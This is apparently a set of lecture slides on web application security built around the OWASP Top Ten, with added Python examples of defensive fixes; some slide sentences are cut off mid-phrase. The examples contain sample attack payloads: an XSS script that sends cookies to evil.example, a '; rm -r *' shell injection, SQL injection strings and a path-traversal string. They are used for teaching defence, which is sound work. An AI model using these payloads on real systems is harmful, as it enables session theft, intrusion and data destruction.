7/27/2019 web_app_sec 1/44
C-DAC, EC, Bangalore

Web Application Security
Centre for Development of Advanced Computing (C-DAC), Electronics City, Bangalore.
Agenda
- Who are your enemies
- What is a web application
- SD3 Security Framework
- Top 10 vulnerabilities
- How to avoid these
- Demo example
Know Your Enemy
"If you know both the enemy and yourself, you will fight a hundred battles without danger of defeat;
If you are ignorant of the enemy but only know yourself, your chances of winning and losing are equal;
If you know neither the enemy nor yourself, you will certainly be defeated in every battle."
SUN TZU, ON THE ART OF WAR, the oldest military treatise in the world
Chinese general, 500 B.C.
Who are the enemies?
- Innocent (?) users.. can be you (!)
- Hackers
What is a web application?
Web application
- A web application or web service is a software application that is accessible using a web browser or HTTP(S) user agent.
- A web application or webapp is an application that is accessed via a web browser over a network such as the Internet or an intranet.
- A computer software application that is
Web application security
Simply, Web Application Security is... securing of web applications.
- Security goes beyond establishing a firewall and implementing SSL.
- Includes IDS, policy, standards, awareness, audit, testing.
- Do not assume someone else is taking care of it.
Is your application really secure?
Firewalls
Firewalls can provide:
- Secure gateway to the Internet for internal clients
- Packet filtering
- Auditing
Firewalls cannot provide:
- Protection against application level attacks over HTTP or HTTPS (the firewall has to let ports 80 and 443 through for the site to work at all, so attack requests arrive on exactly the same path as legitimate ones)
Through the firewall without a fire suit
Concepts
- Threat: any event, whether natural, accidental or deliberate, with the potential to cause harm to an information system, resulting in a degradation of the system's ability to fully perform its mission.
- Vulnerability: a weakness (security exposure) in a system software or application software component that a threat can exploit.
The SD3 Security Framework
Secure by Design:
- Secure architecture and code
- Threat analysis
- Vulnerability reduction
Secure by Default:
- Attack surface area reduced
- Unused features turned off by default
- Minimum privileges used
Secure in Deployment:
- Protection: detection, defense, recovery, management
- Process: how-to guides, architecture guides
- People: training
Adopt the SD3 Security Framework
Secure by Design:
- Build threat models
- Conduct code reviews, penetration tests
- Run code with minimal privileges
Secure by Default:
- Minimize your attack surface
- Enable services securely
Secure in Deployment:
- Leverage the security best practices
- Create security guidance
- Build tools to assess application security
Your code is part of your security perimeter
(Diagram: an APPLICATION ATTACK travels through the network layer, Firewall, Hardened OS, Web Server, App Server, Firewall, and lands in the application layer: Custom Developed Application Code, Databases, Legacy Systems, Web Services, Directories, Human Resources, Billing.)
- You can't use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks.
- Your security perimeter has huge holes at the application layer.
Top 10 Vulnerabilities (the OWASP Top Ten, 2003 edition)
1. Unvalidated Parameters
2. Broken Access Control
3. Broken Account and Session Management
4. Cross-site Scripting (XSS) Flaws
5. Buffer Overflows
6. Command Injection Flaws
7. Error Handling Problems
8. Insecure Use of Cryptography
9. Remote Administration Flaws
10. Web and Application Server Misconfiguration
95% of Web Apps Have Vulnerabilities
- Cross-site scripting (80 percent)
- SQL injection (62 percent)
- Parameter tampering (60 percent)
- Cookie poisoning (37 percent)
- Database server (33 percent)
- Web server (23 percent)
- Buffer overflow (19 percent)
1. Unvalidated Parameters
An attacker can easily tamper with any part of the HTTP request before submitting it:
- URL
- Cookies
- Form fields
- Hidden fields
- Headers
Common names for common input tampering attacks: forced browsing, command insertion, cross-site scripting, buffer overflows, format string attacks, SQL injection, cookie poisoning, and hidden field manipulation.
Unvalidated Parameters continued..
Do rigorous input data validation
- All parameters should be validated before use
Do server-side validation
- Client-side validation can be bypassed by the attacker easily (a proxy or a hand-built request never runs the browser's checks)
- Client-side validation is to be used mainly for quick user responsiveness
Unvalidated Parameters continued..
Use centralized code for input validation
- Scattered code is hard to maintain
Each parameter should be checked against a strict format that specifies exactly what input will be allowed (an allow-list of acceptable values, not a deny-list of known-bad characters).
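The three validation slides above, as one piece of working code. This is an added example, not code from the C-DAC deck: the parameter names, the formats in `RULES` and the two sample requests are constructed for illustration. It applies a single central policy to every input the server reads (query string, form and hidden fields, cookies, headers), anchors every pattern with `re.fullmatch`, and rejects unknown fields, so a hidden-field rewrite or an extra parameter the form never had is refused before any handler sees it.

```python
"""Centralized, allow-list input validation for HTTP request parameters.

Added example (not from the original slides). Every parameter name,
pattern and the sample request below are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Any, Dict


@dataclass(frozen=True)
class Rule:
    """Exact format a parameter must match before the application may use it."""
    pattern: str            # regex describing the allowed values (fullmatch-anchored)
    max_len: int            # hard length cap, checked before the regex runs
    required: bool = True


# One central policy for the whole application: every input the server
# reads (URL query, form fields, hidden fields, cookies, headers) has a rule.
RULES: Dict[str, Rule] = {
    "user_id":   Rule(r"[0-9]{1,10}", 10),
    "username":  Rule(r"[A-Za-z0-9_]{3,32}", 32),
    "email":     Rule(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}", 254),
    "quantity":  Rule(r"[1-9][0-9]{0,2}", 3),          # 1..999, never negative
    "session":   Rule(r"[A-Za-z0-9_-]{43}", 43),       # shape of token_urlsafe(32)
    "next_page": Rule(r"/[A-Za-z0-9/_-]*", 200, required=False),  # local path only
}


class ValidationError(ValueError):
    pass


def validate_request(params: Dict[str, Any]) -> Dict[str, str]:
    """Check every parameter against its rule; reject the whole request on any failure.

    - Unknown parameters are rejected (the attacker added a field we never defined).
    - Missing required parameters are rejected.
    - Values are matched with re.fullmatch, so the whole value must fit the
      pattern; a trailing newline or appended SQL cannot slip past a '$' anchor.
    """
    clean: Dict[str, str] = {}
    for name in params:
        if name not in RULES:
            raise ValidationError(f"unexpected parameter: {name!r}")
    for name, rule in RULES.items():
        if name not in params:
            if rule.required:
                raise ValidationError(f"missing parameter: {name!r}")
            continue
        value = params[name]
        if not isinstance(value, str):
            raise ValidationError(f"{name!r}: expected a single string value")
        if len(value) > rule.max_len:
            raise ValidationError(f"{name!r}: too long")
        if re.fullmatch(rule.pattern, value) is None:
            raise ValidationError(f"{name!r}: does not match the allowed format")
        clean[name] = value
    return clean


def is_valid(params: Dict[str, Any]) -> bool:
    try:
        validate_request(params)
        return True
    except ValidationError:
        return False


if __name__ == "__main__":
    # Constructed sample requests. The second one is tampered: the hidden
    # 'quantity' field rewritten to a negative number, a user_id that is really
    # a SQL fragment, and an extra 'is_admin' field the form never had.
    good = {"user_id": "42", "username": "alice", "email": "alice@example.com",
            "quantity": "2", "session": "A" * 43}
    bad = dict(good, quantity="-1", user_id="42 OR 1=1", is_admin="true")
    print("good request accepted:", is_valid(good))      # True
    print("tampered request accepted:", is_valid(bad))   # False
```

Because the policy lives in one table, adding a field to a form means adding one line here; a field without a rule is refused by default rather than silently passed through.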
2. Broken Access Control
- Access control is how you keep one user away from other users' information.
- The problem is that many environments provide authentication, but don't handle access control well: the server knows who the caller is, yet never asks whether that caller may touch the object named in the request.
- Many sites have a complex access control policy.
Key points
- Write down your access control policy
- Don't use any ids that an attacker can
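The slide's two key points, as an added example that is not part of the original deck: the policy is written down in one function (`may_read_invoice`), and the id arriving in the request is never trusted on its own; the decision is made against the server-side session. The invoice table, the `Session` type and the three users are constructed for illustration, and `get_invoice_insecure` shows the flaw being described: authenticated, but no object-level check.

```python
"""Object-level access control: deny by default, decide from the server-side session.

Added example, not from the original slides. The record store, users and
the `Session` type are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, Optional


@dataclass(frozen=True)
class Session:
    user_id: int
    roles: FrozenSet[str]


@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    owner_id: int
    amount: int


# Constructed data: invoices 1001-1003 belong to three different users.
INVOICES: Dict[int, Invoice] = {
    1001: Invoice(1001, owner_id=1, amount=120),
    1002: Invoice(1002, owner_id=2, amount=450),
    1003: Invoice(1003, owner_id=3, amount=80),
}


class AccessDenied(PermissionError):
    pass


def may_read_invoice(session: Session, invoice: Invoice) -> bool:
    """The written-down policy: the owner and the 'support' role may read an
    invoice. Anything not explicitly listed here is denied."""
    if invoice.owner_id == session.user_id:
        return True
    if "support" in session.roles:
        return True
    return False


def get_invoice(session: Session, invoice_id: int) -> Invoice:
    """The only code path that hands an invoice to a caller.

    The id comes from the request and is attacker-controlled, so the check is
    made against the *session* (set server-side at login), never against a
    user id or role carried in the request itself.
    """
    invoice = INVOICES.get(invoice_id)
    if invoice is None or not may_read_invoice(session, invoice):
        # Same error for 'does not exist' and 'not yours', so the caller
        # cannot enumerate valid ids by probing.
        raise AccessDenied("invoice not available")
    return invoice


def get_invoice_insecure(session: Session, invoice_id: int) -> Optional[Invoice]:
    """The flaw the slide describes: authentication happened, but the lookup
    trusts the id and never asks who is allowed to see the record."""
    return INVOICES.get(invoice_id)


def can_read(session: Session, invoice_id: int) -> bool:
    try:
        get_invoice(session, invoice_id)
        return True
    except AccessDenied:
        return False


if __name__ == "__main__":
    alice = Session(user_id=1, roles=frozenset())
    mallory = Session(user_id=2, roles=frozenset())
    agent = Session(user_id=99, roles=frozenset({"support"}))
    print("alice reads 1001:", can_read(alice, 1001))       # True
    print("mallory reads 1001:", can_read(mallory, 1001))   # False: owned by alice
    print("support reads 1001:", can_read(agent, 1001))     # True
    print("insecure path leaks 1001 to mallory:",
          get_invoice_insecure(mallory, 1001) is not None)  # True
```

Keeping the policy in one function also makes the later slide's advice practical: the access control policy can be reviewed, tested and diffed as a unit instead of being rediscovered across every handler.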
3. Broken Account and Session Management
Includes all aspects of handling user authentication and managing active sessions.
Session hijacking
- If the session cookies are not properly protected, an attacker can hijack an active session and assume the identity of a user.
Account management
- Handling credentials across the client-server gap
- Backend authentication credentials too
Broken Account and Session Management ...
Session management
- HTTP is a stateless protocol. Web apps need to keep track of which request came from which user.
- Brand sessions with an id using a cookie, hidden field, URL tag, etc. (ids carried in the URL leak through Referer headers, bookmarks and proxy logs; a cookie marked HttpOnly and Secure is the safer carrier)
Key points
- Keep credentials secret at all times
- Use only the random session id provided by your environment
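What "a random session id, properly protected" looks like in practice, as an added example that is not from the original deck and is not any particular framework's implementation: an id drawn from the OS CSPRNG that carries no meaning of its own, a server-side table that gives it meaning, a cookie with the HttpOnly/Secure/SameSite attributes, rotation at login so a pre-planted id (session fixation) never becomes authenticated, and an idle timeout. The store, cookie name and the `login`/`current_user` helpers are constructed for illustration; in a real application you would use the environment's session facility rather than writing your own, which is the slide's point.

```python
"""Session ids: CSPRNG-generated, bound to the user server-side, carried in a
hardened cookie, rotated at login, expired when idle.

Added example, not from the original slides. The store, cookie name and the
`login`/`current_user` functions are constructed for illustration.
"""
import secrets
import time
from typing import Dict, Optional

SESSION_COOKIE = "SID"
IDLE_TIMEOUT = 15 * 60   # seconds of inactivity before a session is dropped


class SessionStore:
    """Server-side map from opaque session id -> session data.

    The id carries no information (no user id, no counter, no timestamp); all
    meaning lives in this table, so there is nothing for the client to tamper.
    """

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}

    def create(self, user_id: int, now: float) -> str:
        sid = secrets.token_urlsafe(32)        # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user_id": user_id, "last_seen": now}
        return sid

    def lookup(self, sid: Optional[str], now: float) -> Optional[int]:
        data = self._sessions.get(sid) if sid else None
        if data is None:
            return None
        if now - data["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]            # expired: forget it
            return None
        data["last_seen"] = now
        return data["user_id"]

    def rotate(self, old_sid: Optional[str], user_id: int, now: float) -> str:
        """Issue a fresh id at login so an id the attacker planted before login
        (session fixation) never becomes an authenticated session."""
        if old_sid in self._sessions:
            del self._sessions[old_sid]
        return self.create(user_id, now)

    def destroy(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def set_cookie_header(sid: str) -> str:
    """Set-Cookie value: unreadable by script (HttpOnly), HTTPS only (Secure),
    not sent on cross-site navigations by default (SameSite=Lax)."""
    return f"{SESSION_COOKIE}={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Minimal Cookie: header parser for the demo (name=value pairs split on ';')."""
    out: Dict[str, str] = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            out[name] = value
    return out


def login(store: SessionStore, pre_login_sid: Optional[str], user_id: int, now: float) -> str:
    """Credentials are assumed verified by the caller; returns the Set-Cookie value."""
    sid = store.rotate(pre_login_sid, user_id, now)
    return set_cookie_header(sid)


def current_user(store: SessionStore, cookie_header: str, now: float) -> Optional[int]:
    sid = parse_cookie_header(cookie_header).get(SESSION_COOKIE)
    return store.lookup(sid, now)


if __name__ == "__main__":
    store = SessionStore()
    t0 = time.time()
    planted = "attacker-chosen-id"             # fixation attempt: never in the store
    set_cookie = login(store, planted, user_id=7, now=t0)
    sid = parse_cookie_header(set_cookie)[SESSION_COOKIE]
    print("user from valid cookie:", current_user(store, f"SID={sid}", t0 + 1))          # 7
    print("planted id usable:", current_user(store, f"SID={planted}", t0 + 1))          # None
    print("after idle timeout:", current_user(store, f"SID={sid}", t0 + IDLE_TIMEOUT + 1))  # None
```

Note what is absent: the cookie never contains the user id, a role, or anything the server reads back and trusts. The "credentials across the client-server gap" on the previous slide are handled the same way: the client holds an opaque handle, the server holds the facts.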
4. Cross-site Scripting (XSS)
An attacker can use the cross-site scripting technique to inject malicious script (into a server), which is then sent to unsuspecting users accessing the same server.
Example: chat server
The attacked user's (victim's) browser has no way to know that the script should not be trusted, and will execute the script.
Because it thinks the script came from a trusted source, the
4. Cross-site Scripting (XSS)
What does it do?
- Disclose the user's session cookie: session hijacking
- Disclose end user files
- Redirect the user to some other page or site
- Modify presentation of content
How to avoid it?
- Search for all places where input from an HTTP request could possibly make its way into the HTML output, and encode it there for the context it lands in (HTML body, attribute value, JavaScript string, URL). Input validation helps, but output encoding is the control that actually stops the script from running.
XSS scenario continued..
- The server is a chat server.
- The chat server displays whatever message is typed in by a particular user to all other users.
- An attacker (user A) includes JavaScript as part of a message (message A).
- The chat server saves the message (into the database or whatever storage) without input validation.
- When unsuspecting user (user B) reads the
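The chat-server scenario above, rendered both ways, as an added example that is not part of the original deck. The two-message chat log, user A's cookie-stealing payload and the list-item template are constructed for illustration. The vulnerable renderer echoes stored text straight into HTML; the fixed one applies `html.escape` at the point where request data meets markup, which is the "search for every place input reaches the HTML output" rule from the previous slide.

```python
"""Stored XSS in the chat-server scenario: the vulnerable rendering beside the fixed one.

Added example, not from the original slides. The chat store, the message
payload and the HTML template are constructed for illustration.
"""
import html
from typing import List, Tuple

# Constructed chat log: user A's "message" is a script, user B's is benign.
MESSAGES: List[Tuple[str, str]] = [
    ("userA", "<script>new Image().src='https://evil.example/?c='+document.cookie</script>"),
    ("userB", "hi all <3"),
]


def render_chat_vulnerable(messages: List[Tuple[str, str]]) -> str:
    """Echoes the stored text as-is: whatever A typed becomes markup in B's browser."""
    rows = [f"<li><b>{user}</b>: {text}</li>" for user, text in messages]
    return "<ul>" + "".join(rows) + "</ul>"


def render_chat_safe(messages: List[Tuple[str, str]]) -> str:
    """Output encoding at the point where request data meets HTML.

    html.escape turns < > & " ' into entities, so the browser shows A's script
    as text instead of executing it. The data may still be stored as typed;
    the encoding belongs to the output context (here: HTML body text).
    """
    rows = [f"<li><b>{html.escape(user)}</b>: {html.escape(text)}</li>"
            for user, text in messages]
    return "<ul>" + "".join(rows) + "</ul>"


def attribute_safe(value: str) -> str:
    """Same idea for the attribute context: always quote, and escape the quotes,
    so 'x" onmouseover="...' cannot break out of the attribute."""
    return '"' + html.escape(value, quote=True) + '"'


def contains_live_script(rendered: str) -> bool:
    """Crude check used by the demo: does a real <script> tag survive rendering?"""
    return "<script>" in rendered.lower()


if __name__ == "__main__":
    print("vulnerable page executes A's script:",
          contains_live_script(render_chat_vulnerable(MESSAGES)))   # True
    print("safe page executes A's script:",
          contains_live_script(render_chat_safe(MESSAGES)))         # False
    print(render_chat_safe(MESSAGES))
```

Marking the session cookie HttpOnly (see the session-management slide) is a second, independent layer: even where an encoding is missed, `document.cookie` then returns nothing worth stealing.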
5. Buffer Overflow
- Many systems put limits on how much data a variable can store or a system can handle.
- Often, if these limits are exceeded, the data will still be used, but bypass certain security considerations.
- Attackers use buffer overflows to corrupt the execution stack of a web application.
- By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code.
Buffer Overflow continued..
- Buffer overflow flaws can be present in the web server or application server products, or in the web application itself; in practice they live in native (C/C++) code: the server, CGI programs, extensions and libraries. Code in a memory-safe language is largely exempt, but the runtime and native modules it sits on are not.
- URLs such as: http://www.myweb.com/cgi?param=filename
- Replaced with: http://www.myweb.com/cgi?param=
6. SQL Injection
- When a web application passes information from an HTTP request through as part of an external request, the attacker can inject special (meta) characters, malicious commands, or command modifiers into the information.
- SQL injection is a particularly widespread and dangerous form of injection.
  - To exploit a SQL injection flaw, the attacker must find a parameter that the web application passes through to a database.
SQL Injection continued..
Other forms of the same injection flaw:
- Path traversal
  - ../ characters as part of a filename request
- Additional commands could be tacked on to the end of a parameter that is passed to a shell script to execute an additional shell command
  - ; rm -r *
- SQL queries could be modified by adding additional constraints to a WHERE clause
  - OR 1=1 (typically preceded by a quote character that closes the string literal the parameter was pasted into)
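The two SQL-injection slides above, carried into working code as an added example that is not from the original deck: a login query built by pasting request values into the SQL text, beside the parameterized version, plus a containment check for the `../` path-traversal case on the same slide. The in-memory `users` table, the plaintext passwords (kept only so the injection is visible in two lines; the cryptography slides cover how to store them), the function names and the `/var/www/files` document root are all constructed for illustration.

```python
"""Injection: a query built by string concatenation beside a parameterized one,
plus a path-traversal check for the '../' case on the same slide.

Added example, not from the original slides. The users table, the login
function names and the document root are constructed for illustration.
"""
import posixpath
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Constructed rows; plaintext passwords only to keep the injection demo short.
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "wonderland")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Request data is pasted into the SQL text, so a quote character ends the
    literal and '--' comments out the rest of the statement."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Placeholders: the driver sends the values separately from the query text,
    so they are always data and never SQL, whatever characters they contain."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


DOC_ROOT = "/var/www/files"   # constructed document root


def resolve_under_root(requested: str, root: str = DOC_ROOT) -> Optional[str]:
    """Map a user-supplied file name onto root, rejecting anything that escapes it.

    normpath collapses '.', '..' and duplicate slashes; the containment check
    then runs on the normalized result rather than on the raw string, so
    'docs/../../etc/passwd' is caught although it does not start with '../'.
    (Against a real filesystem, also resolve symlinks, e.g. with os.path.realpath.)
    """
    if "\x00" in requested or requested.startswith("/"):
        return None
    full = posixpath.normpath(posixpath.join(root, requested))
    if full == root or not full.startswith(root + "/"):
        return None
    return full


if __name__ == "__main__":
    conn = make_db()
    payload = "admin' --"     # closes the string and comments out the password check
    print("vulnerable login with payload:", login_vulnerable(conn, payload, "anything"))  # admin
    print("safe login with payload:", login_safe(conn, payload, "anything"))             # None
    print("safe login with real credentials:", login_safe(conn, "alice", "wonderland"))  # alice
    print(resolve_under_root("reports/q1.pdf"))        # /var/www/files/reports/q1.pdf
    print(resolve_under_root("../../etc/passwd"))      # None
```

The shell case on the slide (`; rm -r *`) has the same shape and the same fix: never build a command line from request data; pass arguments as a list to the process API so the shell never parses them.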
7. Improper Error Handling
- The most common problem is when detailed internal error messages such as stack traces, database dumps, and error codes are displayed to a potential hacker.
- These messages reveal implementation details that should never be revealed.
- Inconsistent errors may reveal internal info.
  - File not found vs. Access denied: answering differently tells the attacker which names exist.
Improper Error Handling continued..
- The errors must be handled according to a well thought out scheme that will
  - provide a meaningful error message to the user
  - provide diagnostic information to the site maintainers
  - provide no useful information to an attacker
- All security mechanisms should deny access until specifically granted, not grant access
Improper Error Handling continued..
- A specific policy for how to handle errors should be documented, including
  - the types of errors to be handled
  - for each, what information is going to be reported back to the user
  - what information is going to be logged
- In the implementation, ensure that the site is built to gracefully handle all possible errors.
- When errors occur, the site should respond with a
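The scheme the three error-handling slides describe, as an added example that is not from the original deck: one handler that gives the user a meaningful but generic message, gives the maintainers the full trace under an incident id in a private log, gives the attacker nothing, and answers "not found" and "access denied" identically. The `fetch_file` backend, its owner table, the `archive/` prefix that simulates an outage, the `LOG` list standing in for a log file and the incident-id format are all constructed for illustration.

```python
"""Error handling according to a scheme: generic message to the user, full detail
to the maintainers, nothing useful to the attacker, and the same answer for
'not found' and 'access denied'.

Added example, not from the original slides. The backend, the log sink, the
resource table and the incident-id format are constructed for illustration.
"""
import secrets
import traceback
from typing import Dict, List, Tuple

LOG: List[str] = []   # stands in for the site's private log file (constructed)


class NotFound(Exception):
    pass


class Forbidden(Exception):
    pass


# Constructed resources: file name -> owner
FILES: Dict[str, str] = {"report.pdf": "alice", "salaries.xls": "hr"}


def fetch_file(user: str, name: str) -> str:
    """Constructed storage backend: raises NotFound, Forbidden, or (for the
    'archive/' prefix) a simulated outage so the generic path can be shown."""
    if name.startswith("archive/"):
        raise ConnectionError("archive storage unreachable")
    if name not in FILES:
        raise NotFound(name)
    if FILES[name] != user:
        raise Forbidden(f"{user} is not the owner of {name}")
    return f"<contents of {name}>"


def handle_request(user: str, name: str) -> Tuple[int, str]:
    """Return (status, body) the way a web handler would.

    - NotFound and Forbidden both map to 404 with an identical body, so an
      outsider cannot tell which names exist (the slide's 'file not found vs.
      access denied' leak). The real reason is still logged for maintainers.
    - Any other exception (a bug, a backend outage) maps to a generic 500 that
      carries only an incident id; the stack trace goes to the private log,
      keyed by that id, so the maintainers can still find it.
    """
    try:
        return 200, fetch_file(user, name)
    except (NotFound, Forbidden) as exc:
        LOG.append(f"denied user={user!r} name={name!r} reason={type(exc).__name__}")
        return 404, "The requested item is not available."
    except Exception:
        incident = secrets.token_hex(8)
        LOG.append(f"incident={incident} user={user!r} name={name!r}\n"
                   + traceback.format_exc())
        return 500, f"Something went wrong. Reference: {incident}"


def public_body_leaks_internals(body: str) -> bool:
    """Check used by the demo: the user-facing text must carry no traceback,
    path, exception type or internal reason."""
    needles = ("Traceback", 'File "', "Exception", "Error", "/var/", "NotFound",
               "Forbidden", "owner", "unreachable")
    return any(n in body for n in needles)


if __name__ == "__main__":
    print(handle_request("alice", "report.pdf"))        # (200, '<contents of report.pdf>')
    print(handle_request("alice", "salaries.xls"))      # (404, 'The requested item is not available.')
    print(handle_request("alice", "no-such-file.txt"))  # same 404 body as above
    status, body = handle_request("alice", "archive/old.pdf")
    print(status, body)                                  # 500 Something went wrong. Reference: ...
    print("leaks internals:", public_body_leaks_internals(body))   # False
    print(LOG[-1].splitlines()[0])                       # incident=... line in the private log
```

The catch-all `except Exception` is deliberate and is the "deny until specifically granted" rule applied to errors: a failure nobody anticipated is refused with a generic answer rather than allowed to fall through with a framework-generated page full of internals.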
8. Insecure Use of Cryptography
- Use cryptography to store sensitive information
- Algorithms are simple to use; integrating them is hard
Key points
- Do not even think about inventing a new algorithm
- Be extremely careful storing keys, certs, and passwords
- Rethink whether you need to store the information
- Don't store user passwords: store a salted, deliberately slow password hash (PBKDF2, bcrypt, scrypt or Argon2) and compare it in constant time. A bare SHA-256 of the password, as older guidance such as this slide once suggested, is fast and unsalted, so a leaked table can be cracked offline at very high speed and identical passwords are visible as identical hashes.
9. Remote Administration Flaws
- Many sites allow remote administration
  - Very powerful, often hidden interfaces
  - Difficult to protect ("hidden" is not a control: an unlinked /admin path is found by a crawler or a word list in minutes)
Key points
- Eliminate all administration over the Internet; where that is impossible, reach it only over a VPN or from an allow-listed management network
- Separate the admin application from the main app
- Limit the scope of remote administration
- Consider strong authentication: smart card or token
10. Web and Application Server Misconfiguration
- All web and application servers have many security-relevant configuration options:
  - Default accounts and passwords
  - Unnecessary default, backup, sample apps, libraries
  - Overly informative error messages
  - Misconfigured SSL, default certificates, self-signed certs
  - Unused administrative services
Key points:
- Keep up with patches (Code Red, Slammer)
- Use scanning tools (Nikto, Nessus)
- Write the hardened configuration down as a baseline and compare deployed servers against it; a scanner shows what is exposed today, not what the next deployment will switch back on
Secure your application
Training
- Read the Top Ten paper!
- Get developers trained in web application security
- Try OWASP WebGoat to learn how flaws work
Policy
- Write down the security rules for your application
Reviews
- Get expert code review and penetration tests periodically
Keys to secure your application
Customers
- Demand web applications that don't have these ten simple problems
Developers
- Take responsibility for securing your code
Software development organizations
- Guarantee that your web applications don't have the top ten flaws
Educators
- Stop teaching insecure coding
Project managers
- Split your security budget between network and
Tools
- WebScarab: a web application vulnerability assessment suite including proxy tools
- Validation Filters (Stinger for J2EE, filters for PHP): generic security boundary filters that developers can use in their own applications
- CodeSpy: looks for security issues using reflection in J2EE apps
- WebGoat: an interactive training and benchmarking tool with which users can learn about web application security in a safe and legal environment
- WebSphinx: web crawler looking for security issues in web applications
- OWASP: Java based portal code designed with security as a prime concern
Case Study
Thank You !!